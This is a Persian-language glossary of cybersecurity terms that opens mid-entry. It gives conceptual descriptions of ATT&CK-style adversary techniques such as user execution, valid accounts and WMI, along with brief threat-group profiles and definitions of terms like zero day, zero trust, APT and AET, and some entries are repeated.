حریف ممکن است به کلیک کاربر روی پیوند مخرب برای به دست آوردن اعدام تکیه کند. کاربران ممکن است در معرض مهندسی اجتماعی قرار گیرند تا آنها را وادار به کلیک روی پیوندی کند که منجر به اجرای کد می شود. این اقدام کاربر معمولاً به عنوان رفتار بعدی از Spearphishing Link مشاهده می شود. کلیک کردن روی یک پیوند ممکن است به تکنیک های اجرایی دیگری مانند سوء استفاده از مرورگر یا آسیب پذیری برنامه از طریق Exploitation for Client Execution منجر شود. پیوندها همچنین ممکن است کاربران را به دانلود فایل هایی که نیاز به اجرا دارند از طریق فایل مخرب هدایت کنند.

اجرای کاربر: فایل مخرب

User Execution: Malicious File

حریف ممکن است به باز کردن یک فایل مخرب توسط کاربر متکی باشد تا بتواند اجرا شود. کاربران ممکن است تحت مهندسی اجتماعی قرار بگیرند تا آنها را وادار به باز کردن فایلی کند که منجر به اجرای کد می شود. این اقدام کاربر معمولاً به عنوان رفتار بعدی از Spearphishing Attachment مشاهده می شود. دشمنان ممکن است از چندین نوع فایل استفاده کنند که کاربر باید آنها را اجرا کند، از جمله .doc، .pdf، xls.، rtf.، .scr، exe.، lnk.، pif.، و .cpl. دشمنان ممکن است از اشکال مختلف Masquerading روی فایل استفاده کنند تا احتمال باز کردن آن توسط کاربر را افزایش دهند. در حالی که فایل مخرب اغلب مدت کوتاهی پس از دسترسی اولیه رخ می دهد، ممکن است در مراحل دیگر نفوذ رخ دهد، مانند زمانی که دشمن یک فایل را در یک فهرست مشترک یا روی دسکتاپ کاربر قرار می دهد به این امید که کاربر روی آن کلیک کند. این فعالیت ممکن است مدت کوتاهی پس از Spearphishing داخلی نیز دیده شود.

اجرای کاربر: تصویر مخرب

User Execution: Malicious Image

دشمنان ممکن است به کاربری که یک تصویر مخرب را اجرا می کند برای تسهیل اجرا تکیه کنند. خدمات وب آمازون ( AWS) تصاویر ماشین آمازون (AMI) ، تصاویر پلتفرم ابری گوگل (GCP) و تصاویر آژور و همچنین زمان‌های اجرای کانتینرهای محبوب مانند Docker را می‌توان در پشتی قرار داد. تصاویر Backdoor ممکن است از طریق آپلود بدافزار در یک مخزن عمومی آپلود شوند و کاربران می‌توانند نمونه یا محفظه‌ای را بدون اینکه متوجه مخرب بودن تصویر شوند دانلود و مستقر کنند، بنابراین تکنیک‌هایی را که به طور خاص به دسترسی اولیه می‌رسند دور می‌زنند. این می تواند منجر به اجرای کدهای مخرب شود، مانند کدی که استخراج ارز دیجیتال را در نمونه یا کانتینر اجرا می کند.دشمنان همچنین ممکن است تصاویر را به روش خاصی نامگذاری کنند تا احتمال استفاده اشتباه از سوی کاربران یک نمونه یا محفظه از تصویر را افزایش دهند (مثلاً: مطابقت با نام قانونی یا مکان).

اعتبارنامه های ناامن

Unsecured Credentials

دشمنان ممکن است سیستم های در معرض خطر را جستجو کنند تا اعتبارنامه های ذخیره شده ناامن را پیدا کنند و به دست آورند. این اعتبارنامه‌ها را می‌توان در بسیاری از مکان‌های یک سیستم، از جمله فایل‌های متن ساده (مانند تاریخچه ( Bash)، سیستم‌عامل یا مخازن خاص برنامه (مانند اعتبار در رجیستری)، یا سایر فایل‌ها/مصنوعات تخصصی (مانند کلیدهای خصوصی) ذخیره کرد و/یا نامناسب کرد.

استفاده از مواد احراز هویت جایگزین

Use Alternate Authentication Material

دشمنان ممکن است از مواد احراز هویت جایگزین مانند درهم‌سازی رمز عبور، بلیط‌های Kerberos و نشانه‌های دسترسی برنامه‌ها برای حرکت جانبی در یک محیط و دور زدن کنترل‌های دسترسی عادی سیستم استفاده کنند. فرآیندهای احراز هویت عموماً به یک هویت معتبر (به عنوان مثال، نام کاربری) به همراه یک یا چند عامل احراز هویت (مانند رمز عبور، پین، کارت هوشمند فیزیکی، تولید کننده رمز و غیره) نیاز دارند. پس از اینکه کاربر یا برنامه کاربردی با ارائه یک هویت معتبر و فاکتور(های) احراز هویت مورد نیاز، احراز هویت را با موفقیت انجام داد، مواد احراز هویت جایگزین به طور قانونی توسط سیستم ها تولید می شود. مواد احراز هویت جایگزین نیز ممکن است در طول فرآیند ایجاد هویت تولید شود. ذخیره سازی مواد احراز هویت جایگزین به سیستم اجازه می دهد تا بدون درخواست از کاربر برای وارد کردن مجدد فاکتور(های) احراز هویت، تأیید کند که هویت با موفقیت تأیید شده است. از آنجا که احراز هویت جایگزین باید توسط سیستم حفظ شود - چه در حافظه یا روی دیسک - ممکن است از طریق تکنیک‌های Credential Access در معرض خطر سرقت قرار گیرد. با سرقت مواد احراز هویت جایگزین، دشمنان می‌توانند کنترل‌های دسترسی سیستم را دور بزنند و بدون دانستن رمز عبور متن ساده یا هر عامل دیگر احراز هویت، به سیستم‌ها احراز هویت کنند.

مناطق ابری استفاده نشده/پشتیبانی نشده

Unused/Unsupported Cloud Regions

دشمنان ممکن است نمونه های ابری را در مناطق خدمات جغرافیایی استفاده نشده ایجاد کنند تا از شناسایی فرار کنند. دسترسی معمولاً از طریق حساب‌های مخربی که برای مدیریت زیرساخت‌های ابری استفاده می‌شوند به دست می‌آید. ارائه‌دهندگان خدمات ابری اغلب زیرساخت‌هایی را در سرتاسر جهان به منظور بهبود عملکرد، ارائه افزونگی و اجازه دادن به مشتریان برای برآورده کردن الزامات انطباق ارائه می‌کنند. اغلب اوقات، یک مشتری فقط از زیر مجموعه ای از مناطق موجود استفاده می کند و ممکن است به طور فعال مناطق دیگر را نظارت نکند. اگر حریف منابعی را در یک منطقه استفاده نشده ایجاد کند، ممکن است بتواند بدون شناسایی عمل کند. یک تغییر در این رفتار از تفاوت در عملکرد در مناطق ابری استفاده می کند. یک دشمن می تواند از مناطقی استفاده کند که از خدمات تشخیص پیشرفته پشتیبانی نمی کنند تا از شناسایی فعالیت آنها جلوگیری کند. نمونه ای از استفاده دشمن از مناطق استفاده نشده AWS استخراج ارز دیجیتال از طریق Resource Hijacking است که می تواند هزینه های قابل توجهی را در طول زمان برای سازمان ها و بسته به قدرت پردازشی مورد استفاده به همراه داشته باشد.

استفاده از مواد احراز هویت جایگزین

Use Alternate Authentication Material

دشمنان ممکن است از مواد احراز هویت جایگزین، مانند درهم‌سازی رمز عبور، بلیط‌های Kerberos، و نشانه‌های دسترسی برنامه‌ها برای حرکت جانبی در یک محیط و دور زدن کنترل‌های دسترسی عادی سیستم استفاده کنند. فرآیندهای احراز هویت عموماً به یک هویت معتبر (به عنوان مثال، نام کاربری) به همراه یک یا چند عامل احراز هویت (مانند رمز عبور، پین، کارت هوشمند فیزیکی، تولید کننده رمز و غیره) نیاز دارند. پس از اینکه کاربر یا برنامه کاربردی با ارائه یک هویت معتبر و فاکتور(های) احراز هویت مورد نیاز احراز هویت را تأیید کرد، مواد احراز هویت جایگزین به طور قانونی توسط سیستم ها تولید می شود. مواد احراز هویت جایگزین نیز ممکن است در طول فرآیند ایجاد هویت تولید شود.ذخیره سازی مواد احراز هویت جایگزین به سیستم اجازه می دهد تا بدون درخواست از کاربر برای وارد کردن مجدد فاکتور(های) احراز هویت، تأیید کند که هویت با موفقیت تأیید شده است. از آنجا که احراز هویت جایگزین باید توسط سیستم حفظ شود - چه در حافظه یا روی دیسک - ممکن است از طریق تکنیک‌های Credential Access در معرض خطر سرقت قرار گیرد. با سرقت مواد احراز هویت جایگزین، دشمنان می‌توانند کنترل‌های دسترسی سیستم را دور بزنند و بدون دانستن رمز عبور متن ساده یا هر عامل دیگر احراز هویت به سیستم‌ها احراز هویت کنند.

آسیب‌پذیری

vulnerability

آسیب‌پذیری یک حفره یا ضعف در برنامه است، که می‌تواند یک نقص در طراحی یا یک اشکال در اجرا باشد، که به مهاجم اجازه می‌دهد تا به ذینفعان یک برنامه آسیب برساند. ذینفعان شامل مالک برنامه، کاربران برنامه و سایر نهادهایی هستند که به برنامه متکی هستند.

اسکن آسیب‌پذیری

Vulnerability Scanning

دشمنان ممکن است قربانیان را برای آسیب‌پذیری‌هایی که می‌توانند در هنگام هدف‌گیری استفاده شوند، اسکن کنند. اسکن‌های آسیب‌پذیری معمولاً بررسی می‌کنند که آیا پیکربندی میزبان/ برنامه مورد نظر (مانند نرم افزار و نسخه) به طور بالقوه با هدف سوء استفاده خاصی مطابقت دارد که دشمن می‌خواهد از آن استفاده کند.این اسکن‌ها همچنین ممکن است شامل تلاش‌های گسترده‌تری برای جمع‌آوری اطلاعات میزبان قربانی باشد که می‌تواند برای شناسایی آسیب‌پذیری‌های شناخته شده و قابل استفاده بیشتر مورد استفاده قرار گیرد. اسکن‌های آسیب‌پذیری معمولاً نرم افزارهای در حال اجرا و شماره‌های نسخه را از طریق بنرهای سرور یا دیگر مصنوعات شبکه جمع‌آوری می‌کند. اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها / دامنه‌های باز یا جستجو در پایگاه‌های اطلاعاتی فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها)

حساب های معتبر

Valid Accounts

دشمنان ممکن است اعتبار حساب‌های موجود را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. اعتبارنامه‌های در معرض خطر ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شوند و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شوند. اعتبارنامه‌های به خطر افتاده همچنین ممکن است به یک دشمن امتیاز بیشتری را برای سیستم های خاص یا دسترسی به مناطق محدود شبکه اعطا کند. دشمنان ممکن است تصمیم بگیرند که از بدافزار یا ابزار در ارتباط با دسترسی قانونی آن اعتبارنامه ها استفاده نکنند تا تشخیص حضور آنها دشوارتر شود. همپوشانی مجوزها برای حساب‌های محلی، دامنه و ابری در سراسر شبکه‌ای از سیستم‌ها نگران‌کننده است، زیرا ممکن است دشمن بتواند در میان حساب‌ها و سیستم‌ها حرکت کند تا به سطح بالایی از دسترسی (یعنی مدیر دامنه یا سازمانی) برای دور زدن کنترل های تعیین شده در شرکت برسد.

حساب‌های معتبر: حساب‌های پیش فرض

Valid Accounts: Default Accounts

دشمنان ممکن است اعتبار یک حساب پیش فرض را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های پیش‌فرض آنهایی هستند که در یک سیستم‌عامل داخلی هستند، مانند حساب‌هایGuestیاAdministratorدر سیستم‌های ویندوز. حساب‌های پیش‌فرض همچنین شامل حساب‌های پیش‌فرض مجموعه کارخانه/ ارائه‌دهنده در انواع دیگر سیستم‌ها، نرم‌افزارها یا دستگاه‌ها، از جمله حساب کاربری ریشه در AWS و حساب سرویس پیش‌فرض در Kubernetes هستند. حساب‌های پیش‌فرض به ماشین‌های مشتری محدود نمی‌شوند، بلکه شامل حساب‌هایی می‌شوند که برای تجهیزاتی مانند دستگاه‌های شبکه و برنامه‌های رایانه‌ای از پیش تنظیم شده‌اند، خواه داخلی، منبع باز یا تجاری باشند. وسایلی که از پیش تنظیم شده با نام کاربری و رمز عبور ترکیب می شوند، تهدیدی جدی برای سازمان هایی هستند که پس از نصب آن را تغییر نمی دهند، زیرا آنها اهداف آسانی برای یک دشمن هستند. به طور مشابه، دشمنان همچنین ممکن است از کلیدهای خصوصی افشا شده یا سرقت شده عمومی یا مواد اعتباری برای اتصال قانونی به محیط های راه دور از طریق خدمات از راه دور استفاده کنند.

حساب‌های معتبر: حساب‌های دامنه

Valid Accounts: Domain Accounts

دشمنان ممکن است اعتبار یک حساب دامنه را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب‌های دامنه می‌توانند کاربران، سرپرستان و خدمات را پوشش دهند. دشمنان ممکن است حساب‌های دامنه را که برخی از آنها دارای سطح بالایی از امتیازات هستند، از طریق روش‌های مختلف مانند حذف اعتبار سیستم‌عامل یا استفاده مجدد از رمز عبور، به خطر بیاندازند که امکان دسترسی به منابع ممتاز دامنه را فراهم می‌کند.

حساب های معتبر: حساب های محلی

Valid Accounts: Local Accounts

دشمنان ممکن است اعتبار یک حساب محلی را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. همچنین ممکن است از حساب‌های محلی برای بالا بردن امتیازات و جمع‌آوری اعتبار از طریق تخلیه اعتبار سیستم‌عامل سوء استفاده شود.

حساب های معتبر: حساب های ابری

Valid Accounts: Cloud Accounts

دشمنان ممکن است اعتبار یک حساب ابری را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های ابری آنهایی هستند که توسط یک سازمان برای استفاده کاربران، پشتیبانی از راه دور، خدمات یا مدیریت منابع در یک ارائه‌دهنده خدمات ابری یا برنامه SaaS ایجاد و پیکربندی شده‌اند. در برخی موارد، حساب‌های ابری ممکن است با سیستم مدیریت هویت سنتی، مانند Window Active Directory، فدرال شوند. اعتبار به خطر افتاده برای حساب های ابری می تواند برای جمع آوری داده های حساس از حساب های ذخیره سازی آنلاین و پایگاه های داده استفاده شود. همچنین می‌توان از دسترسی به حساب‌های ابری برای به دست آوردن دسترسی اولیه به یک شبکه با سوء استفاده از یک رابطه معتمد سوء استفاده کرد. مشابه حساب‌های دامنه، به خطر افتادن حساب‌های ابری فدرال ممکن است به دشمنان اجازه دهد راحت‌تر در یک محیط حرکت کنند.

حساب‌های معتبر

Valid Accounts

دشمنان ممکن است اعتبار حساب‌های موجود را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. اعتبارنامه های در معرض خطر ممکن است برای دور زدن کنترل های دسترسی قرار داده شده بر روی منابع مختلف در سیستم های درون شبکه استفاده شوند و حتی ممکن است برای دسترسی دائمی به سیستم های راه دور و سرویس های موجود خارجی، مانند VPN ها، Outlook Web Access و دسکتاپ راه دور استفاده شوند. اعتبار به خطر افتاده همچنین ممکن است به یک حریف امتیاز بیشتری برای سیستم های خاص یا دسترسی به مناطق محدود شبکه بدهد. دشمنان ممکن است ترجیح دهند از بدافزار یا ابزارها در ارتباط با دسترسی قانونی آن اعتبارنامه ها استفاده نکنند تا تشخیص حضور آنها دشوارتر شود. همپوشانی مجوزها برای حساب‌های محلی، دامنه و ابری در سراسر شبکه‌ای از سیستم‌ها نگران‌کننده است، زیرا ممکن است دشمن بتواند بین حساب‌ها و سیستم‌ها چرخش کند تا به سطح بالایی از دسترسی (یعنی مدیر دامنه یا سازمانی) برای دور زدن دسترسی برسد. کنترل های تعیین شده در شرکت.

حساب های معتبر: حساب های پیش فرض

Valid Accounts: Default Accounts

دشمنان ممکن است اعتبار یک حساب پیش‌فرض را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، پایداری، افزایش امتیاز یا فرار از دفاع به دست آورند و از آنها سوء استفاده کنند. حساب‌های پیش‌فرض آنهایی هستند که در یک سیستم‌عامل داخلی هستند، مانند حساب‌هایGuest یا Administrator در سیستم‌های ویندوز. حساب‌های پیش‌فرض همچنین شامل حساب‌های مجموعه پیش‌فرض کارخانه ارائه‌دهنده در انواع دیگر سیستم‌ها، نرم‌افزارها یا دستگاه‌ها، از جمله حساب کاربری ریشه در AWS و حساب سرویس پیش‌فرض در Kubernetes هستند. حساب‌های پیش‌فرض به ماشین‌های مشتری محدود نمی‌شوند، بلکه شامل حساب‌هایی می‌شوند که برای تجهیزاتی مانند دستگاه‌های شبکه و برنامه‌های رایانه‌ای از پیش تنظیم شده‌اند، خواه داخلی، منبع باز یا تجاری باشند. وسایلی که از پیش تعیین شده با نام کاربری و رمز عبور ترکیب می شوند، تهدیدی جدی برای سازمان هایی هستند که پس از نصب آن را تغییر نمی دهند، زیرا آنها اهداف آسانی برای یک دشمن هستند. به طور مشابه، دشمنان همچنین ممکن است از کلیدهای خصوصی افشا شده یا دزدیده شده عمومی یا مواد اعتباری برای اتصال قانونی به محیط های راه دور از طریق خدمات از راه دور استفاده کنند.

حساب های معتبر: حساب های دامنه

Valid Accounts: Domain Accounts

دشمنان ممکن است اعتبار یک حساب دامنه را به‌عنوان وسیله‌ای برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های دامنه آنهایی هستند که توسط Active Directory Domain Services مدیریت می‌شوند که دسترسی و مجوزها در سیستم‌ها و سرویس‌هایی که بخشی از آن دامنه هستند پیکربندی می‌شوند. حساب‌های دامنه می‌توانند کاربران، سرپرستان و خدمات را پوشش دهند. دشمنان ممکن است حساب‌های دامنه را که برخی از آنها دارای سطح بالایی از امتیازات هستند، از طریق روش‌های مختلفی مانند حذف اعتبار سیستم‌عامل یا استفاده مجدد از رمز عبور، به خطر بیاندازند که امکان دسترسی به منابع ممتاز دامنه را فراهم می‌کند.

حساب های معتبر: حساب های محلی

Valid Accounts: Local Accounts

دشمنان ممکن است اعتبار یک حساب محلی را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های محلی آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت در یک سیستم یا سرویس واحد پیکربندی شده‌اند. همچنین ممکن است از حساب‌های محلی برای افزایش امتیازات و جمع‌آوری اعتبارنامه‌ها از طریق تخلیه اعتبار سیستم عامل سوء استفاده شود. استفاده مجدد از گذرواژه ممکن است اجازه سوء استفاده از حساب‌های محلی را در مجموعه‌ای از ماشین‌های موجود در شبکه برای اهداف افزایش امتیاز و حرکت جانبی بدهد.

حساب های معتبر: حساب های ابری

Valid Accounts: Cloud Accounts

دشمنان ممکن است اعتبار یک حساب ابری را به عنوان ابزاری برای دستیابی به دسترسی اولیه، تداوم، افزایش امتیاز، یا فرار دفاعی به دست آورند و از آنها سوء استفاده کنند. حساب‌های ابری آنهایی هستند که توسط یک سازمان برای استفاده توسط کاربران، پشتیبانی از راه دور، خدمات یا برای مدیریت منابع در یک ارائه‌دهنده خدمات ابری یا برنامه SaaS ایجاد و پیکربندی شده‌اند. در برخی موارد، حساب‌های ابری ممکن است با سیستم مدیریت هویت سنتی، مانند Window Active Directory، فدرال شوند. اعتبار به خطر افتاده برای حساب های ابری می تواند برای جمع آوری داده های حساس از حساب های ذخیره سازی آنلاین و پایگاه های داده استفاده شود. همچنین می‌توان از دسترسی به حساب‌های ابری برای به دست آوردن دسترسی اولیه به یک شبکه با سوء استفاده از یک رابطه معتمد سوء استفاده کرد. مشابه حساب‌های دامنه، به خطر افتادن حساب‌های ابری فدرال ممکن است به دشمنان اجازه دهد راحت‌تر در یک محیط حرکت کنند.

فیلمبرداری

Video Capture

دشمن می‌تواند از دستگاه‌های جانبی رایانه (مانند دوربین‌های یکپارچه یا وب‌کم) یا برنامه‌های کاربردی (مانند خدمات تماس ویدیویی) برای ضبط ویدیوهای ضبط‌شده به منظور جمع‌آوری اطلاعات استفاده کند. همچنین ممکن است به جای فایل‌های ویدیویی، از دستگاه‌ها یا برنامه‌ها، در فواصل زمانی مشخص، تصاویر گرفته شود. بدافزارها یا اسکریپت‌ها ممکن است برای تعامل با دستگاه‌ها از طریق یک API موجود ارائه شده توسط سیستم عامل یا برنامه‌ای برای ضبط ویدیو یا تصاویر استفاده شوند. فایل‌های ویدیویی یا تصویری ممکن است روی دیسک نوشته شده و بعداً استخراج شوند. این تکنیک با Screen Capture به دلیل استفاده از دستگاه ها یا برنامه های خاص برای ضبط ویدیو به جای گرفتن صفحه قربانی متفاوت است. در macOS، چند نمونه بدافزار مختلف وجود دارد که وب‌کم کاربر مانند FruitFly و Proton را ضبط می‌کند.

یک گروه تهدید لبنانی

Volatile Cedar

Volatile Cedar یک گروه تهدید لبنانی است که افراد، شرکت ها و مؤسسات را در سراسر جهان هدف قرار داده است. Volatile Cedar از سال 2012 فعالیت می کند و انگیزه آن منافع سیاسی و ایدئولوژیک است.

ابزار مدیریت ویندوز

Windows Management Instrumentation

دشمنان ممکن است از ابزار مدیریت ویندوز (WMI) برای اجرای دستورات و بارهای مخرب سوء استفاده کنند. WMI یک ویژگی مدیریتی است که محیطی یکنواخت برای دسترسی به اجزای سیستم ویندوز فراهم می‌کند. سرویس WMI هم دسترسی محلی و هم از راه دور را امکان‌پذیر می‌سازد، اگرچه دومی توسط سرویس‌های از راه دور مانند مدل شیء مؤلفه توزیع‌شده (DCOM) و مدیریت از راه دور ویندوز (WinRM) تسهیل می‌شود. WMI از راه دور روی DCOM با استفاده از پورت 135 کار می‌کند، در حالی که WMIروی WinRMروی پورت 5985 هنگام استفاده از HTTP و 5986 برای HTTPS عمل می کند. حریف می تواند از WMI برای تعامل با سیستم‌های محلی و راه دور استفاده کند و از آن به عنوان وسیله‌ای برای اجرای رفتارهای مختلف مانند جمع‌آوری اطلاعات برای Discovery و همچنین اجرای از راه دور فایل‌ها به عنوان بخشی از Lateral Movement استفاده کند.

سرویس وب

Web Service

دشمنان ممکن است از یک سرویس وب خارجی موجود و قانونی به عنوان وسیله ای برای انتقال داده ها به/از یک سیستم در معرض خطر استفاده کنند. وب‌سایت‌ها و رسانه‌های اجتماعی محبوب که به عنوان مکانیزمی برای C2 عمل می‌کنند، ممکن است به دلیل احتمال اینکه میزبان‌های داخل یک شبکه از قبل با آن‌ها در ارتباط هستند، قبل از مصالحه، پوشش قابل توجهی ارائه دهند. استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. ارائه دهندگان خدمات وب معمولاً از رمزگذاری SSL/TLS استفاده می کنند که به دشمنان سطح محافظت بیشتری می دهد. استفاده از سرویس‌های وب همچنین ممکن است از زیرساخت‌های C2پشتیبان در برابر کشف از طریق تجزیه و تحلیل باینری بدافزار محافظت کند و در عین حال انعطاف‌پذیری عملیاتی را نیز ممکن می‌سازد (زیرا این زیرساخت ممکن است به صورت پویا تغییر کند).

تضعیف رمزگذاری

Weaken Encryption

دشمنان ممکن است قابلیت رمزگذاری دستگاه شبکه را به خطر بیاندازند تا از رمزگذاری عبور کنند که در غیر این صورت از ارتباطات داده محافظت می کند. از رمزگذاری می توان برای محافظت از ترافیک شبکه انتقال یافته برای حفظ محرمانه بودن (محافظت در برابر افشای غیرمجاز) و یکپارچگی (محافظت در برابر تغییرات غیرمجاز) استفاده کرد. رمزهای رمزگذاری برای تبدیل یک پیام متنی ساده به متن رمزی استفاده می‌شوند و می‌توانند از نظر محاسباتی برای رمزگشایی بدون کلید رمزگشایی مرتبط، فشرده باشند. به طور معمول، کلیدهای طولانی تر، هزینه های رمزگشایی یا رمزگشایی بدون کلید را افزایش می دهند.دشمنان می توانند دستگاه هایی را که ترافیک شبکه را رمزگذاری می کنند به خطر بیاندازند و دستکاری کنند. به عنوان مثال، از طریق رفتارهایی مانند اصلاح تصویر سیستم، کاهش فضای کلید، و غیرفعال کردن سخت افزار کریپتو، یک دشمن می تواند تأثیر منفی داشته باشد و/یا توانایی دستگاه را برای رمزگذاری ایمن ترافیک شبکه از بین ببرد. این امر خطر بیشتری برای افشای غیرمجاز دارد و ممکن است به تسهیل دستکاری داده ها، دسترسی به اعتبار یا تلاش های جمع آوری کمک کند.

یک گروه جاسوسی سایبری

Whitefly

Whitefly یک گروه جاسوسی سایبری است که حداقل از سال 2017 فعالیت می‌کند. این گروه سازمان‌هایی را که عمدتاً در سنگاپور مستقر هستند در طیف گسترده‌ای از بخش‌ها هدف قرار داده است و در درجه اول به سرقت مقادیر زیادی از اطلاعات حساس علاقه دارد. این گروه با حمله ای علیه بزرگترین سازمان بهداشت عمومی سنگاپور، SingHealth مرتبط است.

گروه Windigo

Windigo

گروه Windigo حداقل از سال 2011 فعالیت می کند و هزاران سرور لینوکس و یونیکس را با استفاده از درپشتی Ebury SSH برای ایجاد یک بات نت اسپم به خطر انداخته است. علیرغم مداخله مجری قانون علیه سازندگان، اپراتورهای Windigo به به‌روزرسانی Ebury تا سال 2019 ادامه دادند.

یک گروه تهدید

Windshift

Windshift یک گروه تهدید است که حداقل از سال 2017 فعال بوده است و افراد خاصی را برای نظارت در ادارات دولتی و زیرساخت های حیاتی در سراسر خاورمیانه هدف قرار می دهد.

یک گروه تهدید با منشاء چینی

Winnti Group

گروه Winnti یک گروه تهدید با منشاء چینی است که حداقل از سال 2010 فعال بوده است. این گروه به شدت صنعت بازی را هدف قرار داده است، اما دامنه هدف گذاری خود را نیز گسترش داده است. برخی گزارش‌ها نشان می‌دهند که تعدادی از گروه‌های دیگر، از جمله Axiom، , ، و ارتباط نزدیکی با Winnti Group دارند.

یک گروه تهدید

WIRTE

WRITE یک گروه تهدید است که حداقل از اوت 2018 فعال بوده است. تمرکز این گروه بر هدف قرار دادن دفاع و دیپلمات های خاورمیانه است.

Wizard Spider

یک گروه تهدید با انگیزه مالی مستقر در روسیه است که در اصل برای ایجاد و استقرار TrickBot از حداقل سال 2016 شناخته شده است. Wizard Spider دارای زرادخانه متنوعی از ابزارها است و کمپین های باج افزاری را علیه سازمان های مختلف انجام داده است، از شرکت های بزرگ گرفته تا بیمارستان ها.

یک گروه تهدید در خارج از چین

ZIRCONIUM

ZIRCONIUM یک گروه تهدید در خارج از چین است که حداقل از سال 2017 فعال است و افراد مرتبط با انتخابات ریاست جمهوری 2020 ایالات متحده و رهبران برجسته جامعه بین المللی را هدف قرار داده است.

دسته ای از مسائل امنیتی- نرم افزاری- ضعف

zero day

دسته ای از مسائل امنیتی-نرم افزاری-ضعف-که در آن محققین مستقل یک نقص نرم افزاری را قبل از کشف آن توسط صاحبان کد کشف می کنند. محققان باج افزارهایی را مشاهده کرده اند که قبلاً از سوء استفاده های روز صفر استفاده می کردند. اما نادر است

رویکردی به امنیت

zero trust definition

رویکردی به امنیت که فرض می‌کند دشمنان قبلاً به محیط دیجیتال نفوذ کرده‌اند و تلاش می‌کند با محدود کردن دسترسی افراد، دستگاه‌ها و نرم‌افزارها به منابع ضروری برای انجام عملکردشان و نه بیشتر، تأثیر بالقوه را کاهش دهد.

یک حمله سایبری

zero-day attack

یک حمله سایبری که از یک آسیب پذیری روز صفر سوء استفاده می کند.

یک بدافزار ناشناخته

zero-day malware

یک بدافزار ناشناخته که هیچ امضای شناسایی برای آن در دسترس نیست.

تهدیدهای مداوم پیشرفته

APT )Advanced Persistent Threats)

این تهدیدها در حملات خود کند و مداوم هستند. آنها به یک شبکه هدفمند نفوذ کرده و خاموش می‌مانند و منتظر زمان مناسب برای ایجاد ویرانی هستند.

تکنیک فرار پیشرفته

AET(Advanced Evasion Technique)

نوعی حمله شبکه است که چندین روش فرار مختلف شناخته شده را ترکیب می‌کند تا یک تکنیک جدید ایجاد کند که به طور همزمان در چندین لایه از شبکه ارائه می‌شود. کد موجود در AET لزوماً مخرب نیست. خطر این است که دسترسی غیرقابل تشخیص به مهاجم را برای شبکه فراهم می‌کند.

تفاوت APT وAET

APT vs AET

APT ها به طور خاص حملات هدفمندی هستند که به سطح بالایی از برنامه ریزی و پنهان کاری در طول یک تعهد طولانی مدت نیاز دارند. APT ها می توانند برای هفته ها یا حتی ماه ها ناشناخته بمانند زیرا به طور نامرئی داده ها را از یک سازمان خارج می‌کنند. AET ها به خودی خود یک حمله نیستند، بلکه برای پوشاندن یک APT بسیار بزرگتر استفاده می شوند.

معنی لغت در فارسی

ADFM ) Abstract Digital Forensics Model)

این مدل تعیین جنبه‌های اصلی و کلیدی پروتکل‌های قبل از خودش و همچنین ایده‌هایی از جرم شناسی سنتی به ویژه پروتکل مربوط به جستجوی صحنه جرم فیزیکی FBI است.

کنترل امنیت برنامه کاربردی

ASC )Application Security Control)

کنترل امنیت برنامه کاربردی یک عمل امنیتی است که برنامه‌های غیرمجاز را از راه‌هایی که داده‌ها را در معرض خطر قرار می‌دهد، مسدود یا محدود می‌کند. کنترل برنامه شامل بررسی کامل بودن و اعتبار، شناسایی، احراز هویت، مجوز، کنترل‌های ورودی و سایر موارد است.

فرایند مدیریت امنیت برنامه کاربردی

ASMP) Application Security Management Process)

فرایند مدیریت امنیت برنامه کاربردی به تیم پروژه کمک می‌کند تا بخش‌های مربوط به ONF را در یک پروژه کاربردی خاص اعمال کرده و شواهد نتایج را به طور رسمی در یک چارچوب نرم افزاری برنامه ثبت کند.

آنتی ویروس

AV) Antivirus)

یک برنامه رایانه‌ای است که برای جلوگیری، شناسایی و حذف بدافزارها استفاده می‌شود.

رابط‌های پروتکل برنامه

API )Application Programming Interface)

رابط برنامه نویسی برنامه ارتباط بین رایانه‌ها یا بین برنامه‌های رایانه‌ای است. این یک نوع رابط نرم افزاری است که به سایر نرم افزارها خدمات ارائه می‌دهد. سند یا استانداردی که نحوه ایجاد یا استفاده از چنین اتصال یا رابطی را توصیف می‌کند.

گروه کار ضد فیشینگ

APWG) Anti-Phishing Working Group)

